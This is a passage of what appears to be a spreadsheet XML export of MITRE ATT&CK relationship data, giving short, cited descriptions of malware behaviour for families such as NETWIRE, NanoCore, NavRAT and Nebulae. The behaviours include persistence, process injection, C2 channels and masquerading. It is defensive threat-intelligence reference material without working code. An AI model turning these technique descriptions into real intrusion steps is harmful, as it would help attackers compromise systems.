    <t>[NETWIRE](https://attack.mitre.org/software/S0198) has masqueraded as legitimate software including TeamViewer and macOS Finder.(Citation: Red Canary NETWIRE January 2020)</t>
  </si>
  <si>
    <t>relationship--a1086030-ec11-44fe-9965-919a9175f3ea</t>
  </si>
  <si>
    <t>[NETWIRE](https://attack.mitre.org/software/S0198) can modify the Registry to store its configuration information.(Citation: Red Canary NETWIRE January 2020)</t>
  </si>
  <si>
    <t>relationship--e0c53a14-01d3-42f6-9dea-6cb60ac72025</t>
  </si>
  <si>
    <t>[NETWIRE](https://attack.mitre.org/software/S0198) can use Native API including &lt;code&gt;CreateProcess&lt;/code&gt; &lt;code&gt;GetProcessById&lt;/code&gt;, and &lt;code&gt;WriteProcessMemory&lt;/code&gt;.(Citation: FireEye NETWIRE March 2019)</t>
  </si>
  <si>
    <t>relationship--c2bfefa1-ccd3-4d8d-82d1-275507546de0</t>
  </si>
  <si>
    <t>[NETWIRE](https://attack.mitre.org/software/S0198) can use TCP in C2 communications.(Citation: Red Canary NETWIRE January 2020)(Citation: Unit 42 NETWIRE April 2020)</t>
  </si>
  <si>
    <t>relationship--eaf4c445-8af9-48b7-9971-01a371145fde</t>
  </si>
  <si>
    <t>[NETWIRE](https://attack.mitre.org/software/S0198) has used a custom obfuscation algorithm to hide strings including Registry keys, APIs, and DLL names.(Citation: FireEye NETWIRE March 2019)</t>
  </si>
  <si>
    <t>relationship--4a339bd7-d356-44fb-9677-8f082af2fc11</t>
  </si>
  <si>
    <t>The [NETWIRE](https://attack.mitre.org/software/S0198) binary has been executed via PowerShell script.(Citation: FireEye NETWIRE March 2019)</t>
  </si>
  <si>
    <t>relationship--500c36bc-9f08-404c-9aa6-38680c529ced</t>
  </si>
  <si>
    <t>[NETWIRE](https://attack.mitre.org/software/S0198) can discover processes on compromised hosts.(Citation: FireEye NETWIRE March 2019)</t>
  </si>
  <si>
    <t>relationship--70346bf0-ce5e-46a0-8e0f-dd757afec050</t>
  </si>
  <si>
    <t>The [NETWIRE](https://attack.mitre.org/software/S0198) payload has been injected into benign Microsoft executables via process hollowing.(Citation: FireEye NETWIRE March 2019)(Citation: Red Canary NETWIRE January 2020)</t>
  </si>
  <si>
    <t>relationship--d7e049fb-ac90-4e93-8907-eca54ba04ebd</t>
  </si>
  <si>
    <t>[NETWIRE](https://attack.mitre.org/software/S0198) can inject code into system processes including notepad.exe, svchost.exe, and vbc.exe.(Citation: Red Canary NETWIRE January 2020)</t>
  </si>
  <si>
    <t>relationship--529ad26d-b31e-41c0-8f19-80e2727eb739</t>
  </si>
  <si>
    <t>[NETWIRE](https://attack.mitre.org/software/S0198) can implement use of proxies to pivot traffic.(Citation: Red Canary NETWIRE January 2020)</t>
  </si>
  <si>
    <t>relationship--060a6b38-18fb-46ac-97c1-b1c40d493b6c</t>
  </si>
  <si>
    <t>[NETWIRE](https://attack.mitre.org/software/S0198) creates a Registry start-up entry to establish persistence.(Citation: McAfee Netwire Mar 2015)(Citation: Red Canary NETWIRE January 2020)(Citation: Unit 42 NETWIRE April 2020)(Citation: Proofpoint NETWIRE December 2020)</t>
  </si>
  <si>
    <t>relationship--06eb051c-74d0-4bbd-8cdf-1018b3c2e748</t>
  </si>
  <si>
    <t>[NETWIRE](https://attack.mitre.org/software/S0198) can create a scheduled task to establish persistence.(Citation: FireEye NETWIRE March 2019)</t>
  </si>
  <si>
    <t>relationship--c55f4782-5303-4ef2-9f5f-49dbe15c138e</t>
  </si>
  <si>
    <t>[NETWIRE](https://attack.mitre.org/software/S0198) can capture the victim's screen.(Citation: McAfee Netwire Mar 2015)(Citation: FireEye NETWIRE March 2019)(Citation: Red Canary NETWIRE January 2020)(Citation: Proofpoint NETWIRE December 2020)</t>
  </si>
  <si>
    <t>relationship--ca71a63a-4481-46d2-98b2-b83cce190380</t>
  </si>
  <si>
    <t>[NETWIRE](https://attack.mitre.org/software/S0198) has used .NET packer tools to evade detection.(Citation: Red Canary NETWIRE January 2020)</t>
  </si>
  <si>
    <t>relationship--295f4cf0-1fb7-4d60-8e15-af8f301d0e1b</t>
  </si>
  <si>
    <t>[NETWIRE](https://attack.mitre.org/software/S0198) has been spread via e-mail campaigns utilizing malicious attachments.(Citation: Unit 42 NETWIRE April 2020)(Citation: Proofpoint NETWIRE December 2020)</t>
  </si>
  <si>
    <t>relationship--e4d36f81-8028-4eae-8bc2-d856296afb46</t>
  </si>
  <si>
    <t>[NETWIRE](https://attack.mitre.org/software/S0198) has been spread via e-mail campaigns utilizing malicious links.(Citation: Unit 42 NETWIRE April 2020)</t>
  </si>
  <si>
    <t>relationship--95b0d9c3-e905-468c-8498-6550f2130826</t>
  </si>
  <si>
    <t>[NETWIRE](https://attack.mitre.org/software/S0198) can use AES encryption for C2 data transferred.(Citation: Red Canary NETWIRE January 2020)</t>
  </si>
  <si>
    <t>relationship--2c339e33-c290-42bc-9f2c-056aa0a321d8</t>
  </si>
  <si>
    <t>[NETWIRE](https://attack.mitre.org/software/S0198) can discover and collect victim system information.(Citation: McAfee Netwire Mar 2015)</t>
  </si>
  <si>
    <t>relationship--e2e35a7a-3057-4955-9e7e-c3972e0ad423</t>
  </si>
  <si>
    <t>[NETWIRE](https://attack.mitre.org/software/S0198) can collect the IP address of a compromised host.(Citation: Red Canary NETWIRE January 2020)(Citation: Proofpoint NETWIRE December 2020)</t>
  </si>
  <si>
    <t>relationship--d2af3e5e-29d8-4611-b295-126d4a9a87b1</t>
  </si>
  <si>
    <t>[NETWIRE](https://attack.mitre.org/software/S0198) can capture session logon details from a compromised host.(Citation: FireEye NETWIRE March 2019)</t>
  </si>
  <si>
    <t>relationship--7e62327c-aa58-4ce9-8519-c4bedbd57b80</t>
  </si>
  <si>
    <t>[NETWIRE](https://attack.mitre.org/software/S0198) has the ability to use &lt;code&gt;/bin/bash&lt;/code&gt; and &lt;code&gt;/bin/sh&lt;/code&gt; to execute commands.(Citation: Red Canary NETWIRE January 2020)(Citation: Proofpoint NETWIRE December 2020)</t>
  </si>
  <si>
    <t>relationship--79b95cda-7281-4a71-ac67-007615653d1b</t>
  </si>
  <si>
    <t>[NETWIRE](https://attack.mitre.org/software/S0198) has been executed through use of VBScripts.(Citation: FireEye NETWIRE March 2019)(Citation: Proofpoint NETWIRE December 2020)</t>
  </si>
  <si>
    <t>relationship--4647d052-512b-41cf-a8db-cb33c49edc90</t>
  </si>
  <si>
    <t>[NETWIRE](https://attack.mitre.org/software/S0198) has the ability to communicate over HTTP.(Citation: Red Canary NETWIRE January 2020)(Citation: Proofpoint NETWIRE December 2020)</t>
  </si>
  <si>
    <t>relationship--d6cee2d3-becd-409f-b5e8-00e7ae991845</t>
  </si>
  <si>
    <t>[NETWIRE](https://attack.mitre.org/software/S0198) has used web services including Paste.ee to host payloads.(Citation: FireEye NETWIRE March 2019)</t>
  </si>
  <si>
    <t>relationship--a23f92a2-b88c-4cb0-b028-1883a5a38377</t>
  </si>
  <si>
    <t>[NETWIRE](https://attack.mitre.org/software/S0198) can issue commands using cmd.exe.(Citation: Red Canary NETWIRE January 2020)(Citation: Proofpoint NETWIRE December 2020)</t>
  </si>
  <si>
    <t>relationship--ad0b78f7-37e9-489b-b4ae-ee9c3d8a2075</t>
  </si>
  <si>
    <t>[NETWIRE](https://attack.mitre.org/software/S0198) can use XDG Autostart Entries to establish persistence on Linux systems.(Citation: Red Canary NETWIRE January 2020)</t>
  </si>
  <si>
    <t>relationship--407f0280-bfaf-4c9b-919a-703f2467e10b</t>
  </si>
  <si>
    <t>[NOKKI](https://attack.mitre.org/software/S0353) uses the Windows call SetWindowsHookEx and begins injecting it into every GUI process running on the victim's machine.(Citation: Unit 42 NOKKI Sept 2018)</t>
  </si>
  <si>
    <t>relationship--e712d24e-0fdc-4ce3-96bf-939b7d4a9cd3</t>
  </si>
  <si>
    <t>[NOKKI](https://attack.mitre.org/software/S0353) uses a unique, custom de-obfuscation technique.(Citation: Unit 42 NOKKI Sept 2018)</t>
  </si>
  <si>
    <t>relationship--be07fb4e-06db-4bb0-a1e0-23f34b24a97f</t>
  </si>
  <si>
    <t>[NOKKI](https://attack.mitre.org/software/S0353) can delete files to cover tracks.(Citation: Unit 42 NOKKI Sept 2018)</t>
  </si>
  <si>
    <t>relationship--9669920d-eff9-4436-9357-409eb7db002c</t>
  </si>
  <si>
    <t>[NOKKI](https://attack.mitre.org/software/S0353) has used FTP for C2 communications.(Citation: Unit 42 NOKKI Sept 2018)</t>
  </si>
  <si>
    <t>relationship--ebd87b4c-eca9-4680-9608-a49ec74b5c4b</t>
  </si>
  <si>
    <t>[NOKKI](https://attack.mitre.org/software/S0353) has downloaded a remote module for execution.(Citation: Unit 42 NOKKI Sept 2018)</t>
  </si>
  <si>
    <t>relationship--65384e27-6d16-4d25-a17b-3d74dde8f224</t>
  </si>
  <si>
    <t>[NOKKI](https://attack.mitre.org/software/S0353) can collect data from the victim and stage it in &lt;code&gt;LOCALAPPDATA%\MicroSoft Updatea\uplog.tmp&lt;/code&gt;.(Citation: Unit 42 NOKKI Sept 2018)</t>
  </si>
  <si>
    <t>relationship--c7c855ed-9550-4611-84bd-d4d7c86cef3c</t>
  </si>
  <si>
    <t>[NOKKI](https://attack.mitre.org/software/S0353) is written to %LOCALAPPDATA%\MicroSoft Updatea\svServiceUpdate.exe prior being executed in a new process in an apparent attempt to masquerade as a legitimate folder and file.(Citation: Unit 42 NOKKI Sept 2018)</t>
  </si>
  <si>
    <t>relationship--67f1d68d-fe0f-4e65-8b2a-f614fda68e3c</t>
  </si>
  <si>
    <t>[NOKKI](https://attack.mitre.org/software/S0353) uses Base64 encoding for strings.(Citation: Unit 42 NOKKI Sept 2018)</t>
  </si>
  <si>
    <t>relationship--6f5973be-3c51-4bd1-b652-f12903caa3e2</t>
  </si>
  <si>
    <t>[NOKKI](https://attack.mitre.org/software/S0353) has established persistence by writing the payload to the Registry key &lt;code&gt;HKCU\Software\Microsoft\Windows\CurrentVersion\Run&lt;/code&gt;.(Citation: Unit 42 NOKKI Sept 2018)</t>
  </si>
  <si>
    <t>relationship--534cf936-84e8-49ff-a616-90267467decd</t>
  </si>
  <si>
    <t>[NOKKI](https://attack.mitre.org/software/S0353) has used rundll32 for execution.(Citation: Unit 42 NOKKI Sept 2018)</t>
  </si>
  <si>
    <t>relationship--b1d2f617-f0ca-43b8-921c-687fad920f39</t>
  </si>
  <si>
    <t>[NOKKI](https://attack.mitre.org/software/S0353) can gather information on drives and the operating system on the victim’s machine.(Citation: Unit 42 NOKKI Sept 2018)</t>
  </si>
  <si>
    <t>relationship--ef6d08c0-e9dd-45e1-b5ce-42cd5731f2ab</t>
  </si>
  <si>
    <t>[NOKKI](https://attack.mitre.org/software/S0353) can gather information on the victim IP address.(Citation: Unit 42 NOKKI Sept 2018)</t>
  </si>
  <si>
    <t>relationship--e3347969-1cfd-43f3-b871-65874c4b2f95</t>
  </si>
  <si>
    <t>[NOKKI](https://attack.mitre.org/software/S0353) can collect the username from the victim’s machine.(Citation: Unit 42 NOKKI Sept 2018)</t>
  </si>
  <si>
    <t>relationship--9e1daa60-db2d-4671-b96f-3ebebe1977cc</t>
  </si>
  <si>
    <t>[NOKKI](https://attack.mitre.org/software/S0353) can collect the current timestamp of the victim's machine.(Citation: Unit 42 NOKKI Sept 2018)</t>
  </si>
  <si>
    <t>relationship--4d9b9464-1ade-45e9-9d7b-1c4c967abd81</t>
  </si>
  <si>
    <t>[NOKKI](https://attack.mitre.org/software/S0353) has used HTTP for C2 communications.(Citation: Unit 42 NOKKI Sept 2018)</t>
  </si>
  <si>
    <t>relationship--c5658d84-ba44-44ce-8174-49676e1426d1</t>
  </si>
  <si>
    <t>[Naid](https://attack.mitre.org/software/S0205) creates Registry entries that store information about a created service and point to a malicious DLL dropped to disk.(Citation: Symantec Naid June 2012)</t>
  </si>
  <si>
    <t>relationship--aea0804f-e322-401f-a012-c16c25e0ac70</t>
  </si>
  <si>
    <t>[Naid](https://attack.mitre.org/software/S0205) collects a unique identifier (UID) from a compromised host.(Citation: Symantec Naid June 2012)</t>
  </si>
  <si>
    <t>relationship--70e81cc7-9dd6-4349-b7ab-212a46591cff</t>
  </si>
  <si>
    <t>[Naid](https://attack.mitre.org/software/S0205) collects the domain name from a compromised host.(Citation: Symantec Naid June 2012)</t>
  </si>
  <si>
    <t>relationship--43c0d71b-d82e-45f0-89ce-acb94810c1c3</t>
  </si>
  <si>
    <t>[Naid](https://attack.mitre.org/software/S0205) creates a new service to establish.(Citation: Symantec Naid June 2012)</t>
  </si>
  <si>
    <t>relationship--b707524f-5ac2-47c2-964d-61782e812fda</t>
  </si>
  <si>
    <t>[NanHaiShu](https://attack.mitre.org/software/S0228) uses DNS for the C2 communications.(Citation: fsecure NanHaiShu July 2016)</t>
  </si>
  <si>
    <t>relationship--aae339ae-44bb-48d3-b62e-7f35376bb974</t>
  </si>
  <si>
    <t>[NanHaiShu](https://attack.mitre.org/software/S0228) can change Internet Explorer settings to reduce warnings about malware activity.(Citation: Proofpoint Leviathan Oct 2017)</t>
  </si>
  <si>
    <t>relationship--41e52a99-9797-4c31-8b3c-7adeed98310a</t>
  </si>
  <si>
    <t>[NanHaiShu](https://attack.mitre.org/software/S0228) launches a script to delete their original decoy file to cover tracks.(Citation: fsecure NanHaiShu July 2016)</t>
  </si>
  <si>
    <t>relationship--6c5378fb-d1d3-4873-bf38-5553df5b8845</t>
  </si>
  <si>
    <t>[NanHaiShu](https://attack.mitre.org/software/S0228) can download additional files from URLs.(Citation: Proofpoint Leviathan Oct 2017)</t>
  </si>
  <si>
    <t>relationship--484add44-6a43-4700-b1bc-d64f24157353</t>
  </si>
  <si>
    <t>[NanHaiShu](https://attack.mitre.org/software/S0228) executes additional Jscript code on the victim's machine.(Citation: fsecure NanHaiShu July 2016)</t>
  </si>
  <si>
    <t>relationship--2a94575a-8e47-4d69-964b-f96210a673bd</t>
  </si>
  <si>
    <t>[NanHaiShu](https://attack.mitre.org/software/S0228) uses mshta.exe to load its program and files.(Citation: fsecure NanHaiShu July 2016)</t>
  </si>
  <si>
    <t>relationship--aaca809f-576c-4875-a09d-5a46a5e5e422</t>
  </si>
  <si>
    <t>[NanHaiShu](https://attack.mitre.org/software/S0228) encodes files in Base64.(Citation: fsecure NanHaiShu July 2016)</t>
  </si>
  <si>
    <t>relationship--297b069f-7d1b-4335-9363-c73bd823c322</t>
  </si>
  <si>
    <t>[NanHaiShu](https://attack.mitre.org/software/S0228) modifies the %regrun% Registry to point itself to an autostart mechanism.(Citation: fsecure NanHaiShu July 2016)</t>
  </si>
  <si>
    <t>relationship--cb69898b-b5e4-407a-964d-a13149accdd7</t>
  </si>
  <si>
    <t>[NanHaiShu](https://attack.mitre.org/software/S0228) can gather the victim computer name and serial number.(Citation: Proofpoint Leviathan Oct 2017)</t>
  </si>
  <si>
    <t>relationship--ec3f88b1-ba85-497f-91d0-3eb8dcc5c4f1</t>
  </si>
  <si>
    <t>[NanHaiShu](https://attack.mitre.org/software/S0228) can gather information about the victim proxy server.(Citation: Proofpoint Leviathan Oct 2017)</t>
  </si>
  <si>
    <t>relationship--3bfef472-e4b0-41be-be6b-314400c079cb</t>
  </si>
  <si>
    <t>[NanHaiShu](https://attack.mitre.org/software/S0228) collects the username from the victim.(Citation: fsecure NanHaiShu July 2016)</t>
  </si>
  <si>
    <t>relationship--f5bbb96e-40b9-4a8c-a53d-bcd843daeac2</t>
  </si>
  <si>
    <t>[NanHaiShu](https://attack.mitre.org/software/S0228) executes additional VBScript code on the victim's machine.(Citation: fsecure NanHaiShu July 2016)</t>
  </si>
  <si>
    <t>relationship--3a31a022-8bb1-4102-9c9a-7289febdcc5c</t>
  </si>
  <si>
    <t>[NanoCore](https://attack.mitre.org/software/S0336) can capture audio feeds from the system.(Citation: DigiTrust NanoCore Jan 2017)(Citation: PaloAlto NanoCore Feb 2016)</t>
  </si>
  <si>
    <t>relationship--72e501db-419e-4fe9-9f10-fa8f266d829b</t>
  </si>
  <si>
    <t>[NanoCore](https://attack.mitre.org/software/S0336) can modify the victim's firewall.(Citation: DigiTrust NanoCore Jan 2017)(Citation: PaloAlto NanoCore Feb 2016)</t>
  </si>
  <si>
    <t>relationship--23bb2f7c-9f4e-4c11-b4e9-b41ba6e6f4c1</t>
  </si>
  <si>
    <t>[NanoCore](https://attack.mitre.org/software/S0336) can modify the victim's anti-virus.(Citation: DigiTrust NanoCore Jan 2017)(Citation: PaloAlto NanoCore Feb 2016)</t>
  </si>
  <si>
    <t>relationship--c81c6d91-00f3-4c8b-bf34-929972685aa3</t>
  </si>
  <si>
    <t>[NanoCore](https://attack.mitre.org/software/S0336) has the capability to download and activate additional modules for execution.(Citation: DigiTrust NanoCore Jan 2017)(Citation: PaloAlto NanoCore Feb 2016)</t>
  </si>
  <si>
    <t>relationship--10806c6b-100d-456b-bb05-62d90713be64</t>
  </si>
  <si>
    <t>[NanoCore](https://attack.mitre.org/software/S0336) can perform keylogging on the victim’s machine.(Citation: PaloAlto NanoCore Feb 2016)</t>
  </si>
  <si>
    <t>relationship--a09b9e3f-96b8-4fde-9f7d-261b449cdabd</t>
  </si>
  <si>
    <t>[NanoCore](https://attack.mitre.org/software/S0336) has the capability to edit the Registry.(Citation: DigiTrust NanoCore Jan 2017)(Citation: PaloAlto NanoCore Feb 2016)</t>
  </si>
  <si>
    <t>relationship--a21afd42-09ae-4e6b-a065-dc1b4454216d</t>
  </si>
  <si>
    <t>[NanoCore](https://attack.mitre.org/software/S0336)’s plugins were obfuscated with Eazfuscater.NET 3.3.(Citation: PaloAlto NanoCore Feb 2016)</t>
  </si>
  <si>
    <t>relationship--2f884873-308c-4bee-94bd-90bb2267fea7</t>
  </si>
  <si>
    <t>[NanoCore](https://attack.mitre.org/software/S0336) creates a RunOnce key in the Registry to execute its VBS scripts each time the user logs on to the machine.(Citation: Cofense NanoCore Mar 2018)</t>
  </si>
  <si>
    <t>relationship--dd417d31-d129-44ac-8a9f-b14b79235dfa</t>
  </si>
  <si>
    <t>[NanoCore](https://attack.mitre.org/software/S0336) uses DES to encrypt the C2 traffic.(Citation: PaloAlto NanoCore Feb 2016)</t>
  </si>
  <si>
    <t>relationship--a5f33976-796d-46b8-9c5f-5545ef25c03f</t>
  </si>
  <si>
    <t>[NanoCore](https://attack.mitre.org/software/S0336) gathers the IP address from the victim’s machine.(Citation: DigiTrust NanoCore Jan 2017)</t>
  </si>
  <si>
    <t>relationship--14fe92e6-9a5e-4116-8316-e52f6270b02c</t>
  </si>
  <si>
    <t>[NanoCore](https://attack.mitre.org/software/S0336) can access the victim's webcam and capture data.(Citation: DigiTrust NanoCore Jan 2017)(Citation: PaloAlto NanoCore Feb 2016)</t>
  </si>
  <si>
    <t>relationship--1efc9685-b2ab-46fb-91a9-a305d6c1f335</t>
  </si>
  <si>
    <t>[NanoCore](https://attack.mitre.org/software/S0336) uses VBS files.(Citation: Cofense NanoCore Mar 2018)</t>
  </si>
  <si>
    <t>relationship--a01519cd-b198-4c60-a5ed-1ca3528d0606</t>
  </si>
  <si>
    <t>[NanoCore](https://attack.mitre.org/software/S0336) can open a remote command-line interface and execute commands.(Citation: PaloAlto NanoCore Feb 2016) [NanoCore](https://attack.mitre.org/software/S0336) uses JavaScript files.(Citation: Cofense NanoCore Mar 2018)</t>
  </si>
  <si>
    <t>relationship--13219288-d8b3-4464-a173-923ed8dfae0a</t>
  </si>
  <si>
    <t>[NativeZone](https://attack.mitre.org/software/S0637) can decrypt and decode embedded  [Cobalt Strike](https://attack.mitre.org/software/S0154) beacon stage shellcode.(Citation: MSTIC Nobelium Toolset May 2021)</t>
  </si>
  <si>
    <t>relationship--abeb8fca-e470-4119-a07f-a6ec2f4b4667</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</si>
  <si>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</si>
  <si>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relationship--b704b2b0-50c5-4fba-ab6c-db346b3524c7</t>
  </si>
  <si>
    <t>[NativeZone](https://attack.mitre.org/software/S0637) can display an RTF document to the user  to enable execution of  [Cobalt Strike](https://attack.mitre.org/software/S0154) stage shellcode.(Citation: MSTIC Nobelium Toolset May 2021)</t>
  </si>
  <si>
    <t>relationship--19ca041f-64be-42f8-9ed1-361410a4c28b</t>
  </si>
  <si>
    <t>[NativeZone](https://attack.mitre.org/software/S0637) has, upon execution, displayed a message box that appears to be related to a Ukrainian electronic document management system.(Citation: SentinelOne NobleBaron June 2021)</t>
  </si>
  <si>
    <t>relationship--bc2fe4e7-cb7c-4707-b28b-a709c2ac017d</t>
  </si>
  <si>
    <t>[NativeZone](https://attack.mitre.org/software/S0637) has used rundll32 to execute a malicious DLL.(Citation: SentinelOne NobleBaron June 2021)</t>
  </si>
  <si>
    <t>relationship--a6e374d3-1de7-4f5e-8fce-42cc326886bc</t>
  </si>
  <si>
    <t>[NativeZone](https://attack.mitre.org/software/S0637) has checked if Vmware or VirtualBox VM is running on a compromised host.(Citation: MSTIC Nobelium Toolset May 2021)</t>
  </si>
  <si>
    <t>relationship--983e91df-bb1a-4658-aaad-7549b1a81917</t>
  </si>
  <si>
    <t>[NavRAT](https://attack.mitre.org/software/S0247) can download files remotely.(Citation: Talos NavRAT May 2018)</t>
  </si>
  <si>
    <t>relationship--5b48c2b1-0ce7-4856-9bc7-ae359826550c</t>
  </si>
  <si>
    <t>[NavRAT](https://attack.mitre.org/software/S0247) logs the keystrokes on the targeted system.(Citation: Talos NavRAT May 2018)</t>
  </si>
  <si>
    <t>relationship--9818eeca-be12-4dd3-bf9f-e33d5b409248</t>
  </si>
  <si>
    <t>[NavRAT](https://attack.mitre.org/software/S0247) writes multiple outputs to a TMP file using the &gt;&gt; method.(Citation: Talos NavRAT May 2018)</t>
  </si>
  <si>
    <t>relationship--1784577e-9d82-497b-aba1-bc4d5a23d8f8</t>
  </si>
  <si>
    <t>[NavRAT](https://attack.mitre.org/software/S0247) uses the email platform, Naver, for C2 communications, leveraging SMTP.(Citation: Talos NavRAT May 2018)</t>
  </si>
  <si>
    <t>relationship--5d1d94e9-c0fd-421f-867f-1a426b0dff99</t>
  </si>
  <si>
    <t>[NavRAT](https://attack.mitre.org/software/S0247) uses &lt;code&gt;tasklist /v&lt;/code&gt; to check running processes.(Citation: Talos NavRAT May 2018)</t>
  </si>
  <si>
    <t>relationship--b9e42e0a-e779-4491-b107-a064254a7da3</t>
  </si>
  <si>
    <t>[NavRAT](https://attack.mitre.org/software/S0247) copies itself into a running Internet Explorer process to evade detection.(Citation: Talos NavRAT May 2018)</t>
  </si>
  <si>
    <t>relationship--81bace85-005e-4edd-bb71-ca7a57bc8a07</t>
  </si>
  <si>
    <t>[NavRAT](https://attack.mitre.org/software/S0247) creates a Registry key to ensure a file gets executed upon reboot in order to establish persistence.(Citation: Talos NavRAT May 2018)</t>
  </si>
  <si>
    <t>relationship--b28c7fbf-05c6-4be2-9f17-3dcc722cee7c</t>
  </si>
  <si>
    <t>[NavRAT](https://attack.mitre.org/software/S0247) uses &lt;code&gt;systeminfo&lt;/code&gt; on a victim’s machine.(Citation: Talos NavRAT May 2018)</t>
  </si>
  <si>
    <t>relationship--8a00aa55-b7b2-4df5-902b-d01bfdf89089</t>
  </si>
  <si>
    <t>[NavRAT](https://attack.mitre.org/software/S0247) leverages cmd.exe to perform discovery techniques.(Citation: Talos NavRAT May 2018) [NavRAT](https://attack.mitre.org/software/S0247) loads malicious shellcode and executes it in memory.(Citation: Talos NavRAT May 2018)</t>
  </si>
  <si>
    <t>relationship--a2440552-4190-4f72-9cf5-a63eecdff2fb</t>
  </si>
  <si>
    <t>[Nebulae](https://attack.mitre.org/software/S0630) can use DLL side-loading to gain execution.(Citation: Bitdefender Naikon April 2021)</t>
  </si>
  <si>
    <t>relationship--af8dcb52-7530-439a-b04d-856025f1209f</t>
  </si>
  <si>
    <t>[Nebulae](https://attack.mitre.org/software/S0630) has the capability to upload collected files to C2.(Citation: Bitdefender Naikon April 2021)</t>
  </si>
  <si>
    <t>relationship--2ae5b107-c648-45d4-9930-dcc42adac2c3</t>
  </si>
  <si>
    <t>[Nebulae](https://attack.mitre.org/software/S0630) has the ability to delete files and directories.(Citation: Bitdefender Naikon April 2021)</t>
  </si>
  <si>
    <t>relationship--8a033ef9-10ca-4ed9-9c57-421f769485ae</t>
  </si>
  <si>
    <t>[Nebulae](https://attack.mitre.org/software/S0630) can list files and directories on a compromised host.(Citation: Bitdefender Naikon April 2021)</t>
  </si>
  <si>
    <t>relationship--dd88acc4-a6c0-43ac-9967-6158469d97bb</t>
  </si>
  <si>
    <t>[Nebulae](https://attack.mitre.org/software/S0630) can download files from C2.(Citation: Bitdefender Naikon April 2021)</t>
  </si>
  <si>
    <t>relationship--156d46b3-538e-4481-ad53-b85de891f6d5</t>
  </si>
  <si>
    <t>[Nebulae](https://attack.mitre.org/software/S0630) has created a service named "Windows Update Agent1" to appear legitimate.(Citation: Bitdefender Naikon April 2021)</t>
  </si>
  <si>
    <t>relationship--87e49c65-5484-47f3-bcd6-a8cc6308c3f2</t>
  </si>
  <si>
    <t>01 July 2021</t>
  </si>
  <si>
    <t>[Nebulae](https://attack.mitre.org/software/S0630) uses functions named &lt;code&gt;StartUserModeBrowserInjection&lt;/code&gt; and &lt;code&gt;StopUserModeBrowserInjection&lt;/code&gt; indicating that it's trying to imitate chrome_frame_helper.dll.(Citation: Bitdefender Naikon April 2021)</t>
  </si>
  <si>
    <t>relationship--ad1d9fc5-b971-4a89-a099-128317dd1e41</t>
  </si>
  <si>
    <t>[Nebulae](https://attack.mitre.org/software/S0630) has the ability to use &lt;code&gt;CreateProcess&lt;/code&gt; to execute a process.(Citation: Bitdefender Naikon April 2021)</t>
  </si>
  <si>
    <t>relationship--777c4c38-9da2-4473-b5d0-61f175014760</t>
  </si>
  <si>
    <t>[Nebulae](https://attack.mitre.org/software/S0630) can use TCP in C2 communications.(Citation: Bitdefender Naikon April 2021)</t>
  </si>
  <si>
    <t>relationship--4b387706-db60-46d2-bba4-148571381e60</t>
  </si>
  <si>
    <t>[Nebulae](https://attack.mitre.org/software/S0630) can enumerate processes on a target system.(Citation: Bitdefender Naikon April 2021)</t>
  </si>
  <si>
    <t>relationship--6e9ca726-0934-4181-a4e6-51ad9d110318</t>
  </si>
  <si>
    <t>[Nebulae](https://attack.mitre.org/software/S0630) can achieve persistence through a Registry Run key.(Citation: Bitdefender Naikon April 2021)</t>
  </si>
  <si>
    <t>relationship--52fb6aab-7a55-437d-8a2f-d3f84bf98a2f</t>
  </si>
  <si>
    <t>[Nebulae](https://attack.mitre.org/software/S0630) can use RC4 and XOR to encrypt C2 communications.(Citation: Bitdefender Naikon April 2021)</t>
  </si>
  <si>
    <t>relationship--fa44e12d-d936-47ba-8fb4-1c9775c08658</t>
  </si>
  <si>
    <t>[Nebulae](https://attack.mitre.org/software/S0630) can discover logical drive information including the drive type, free space, and volume information.(Citation: Bitdefender Naikon April 2021)</t>
  </si>
  <si>
    <t>relationship--22a699a2-ad75-470e-87c9-9ec8f9763e8e</t>
  </si>
  <si>
    <t>[Nebulae](https://attack.mitre.org/software/S0630) can use CMD to execute a process.(Citation: Bitdefender Naikon April 2021)</t>
  </si>
  <si>
    <t>relationship--bf2660a6-1703-4dd9-ab0b-cc264e79a501</t>
  </si>
  <si>
    <t>[Nebulae](https://attack.mitre.org/software/S0630) can create a service to establish persistence.(Citation: Bitdefender Naikon April 2021)</t>
  </si>
  <si>
    <t>relationship--9ea7df8f-3720-4153-8090-4f1a18ecefac</t>
  </si>
  <si>
    <t>[Neoichor](https://attack.mitre.org/software/S0691) can use the Internet Explorer (IE) COM interface to connect and receive commands from C2.(Citation: Microsoft NICKEL December 2021)</t>
  </si>
  <si>
    <t>relationship--c5331cc2-89e2-40e2-a8b4-7a00198df492</t>
  </si>
  <si>
    <t>[Neoichor](https://attack.mitre.org/software/S0691) can upload files from a victim's machine.(Citation: Microsoft NICKEL December 2021)</t>
  </si>
  <si>
    <t>relationship--a0c3b1cc-5ea6-46c0-8719-f67ae953333e</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</si>
  <si>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</si>
  <si>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relationship--fee1306e-0a56-40c0-b3ea-ff0697c464a4</t>
  </si>
  <si>
    <t>[Neoichor](https://attack.mitre.org/software/S0691) can download additional files onto a compromised host.(Citation: Microsoft NICKEL December 2021)</t>
  </si>
  <si>
    <t>relationship--22a59466-1502-431a-a2c7-a8cb09928a74</t>
  </si>
  <si>
    <t>[Neoichor](https://attack.mitre.org/software/S0691) can check for Internet connectivity by contacting bing[.]com with the request format `bing[.]com?id=&lt;GetTickCount&gt;`.(Citation: Microsoft NICKEL December 2021)</t>
  </si>
  <si>
    <t>relationship--0f70aa6c-c7a0-4628-b073-10fd1c576d45</t>
  </si>
  <si>
    <t>[Neoichor](https://attack.mitre.org/software/S0691) has the ability to configure browser settings by modifying Registry entries under `HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer`.(Citation: Microsoft NICKEL December 2021)</t>
  </si>
  <si>
    <t>relationship--8c29eb34-02dd-42c8-9324-bfad5cde2fc7</t>
  </si>
  <si>
    <t>[Neoichor](https://attack.mitre.org/software/S0691) can collect the OS version and computer name from a compromised host.(Citation: Microsoft NICKEL December 2021)</t>
  </si>
  <si>
    <t>relationship--c089604b-f25e-4a4c-857b-0c2d157d34bb</t>
  </si>
  <si>
    <t>[Neoichor](https://attack.mitre.org/software/S0691) can identify the system language on a compromised host.(Citation: Microsoft NICKEL December 2021)</t>
  </si>
  <si>
    <t>relationship--746c2ff0-e5a1-494f-a9c9-bc45faceb5c5</t>
  </si>
  <si>
    <t xml:space="preserve">[Neoichor](https://attack.mitre.org/software/S0691) can gather the IP address from an infected host.(Citation: Microsoft NICKEL December 2021)  </t>
  </si>
  <si>
    <t>relationship--bf496f91-6737-453e-a8e8-a1d80e0e8dd0</t>
  </si>
  <si>
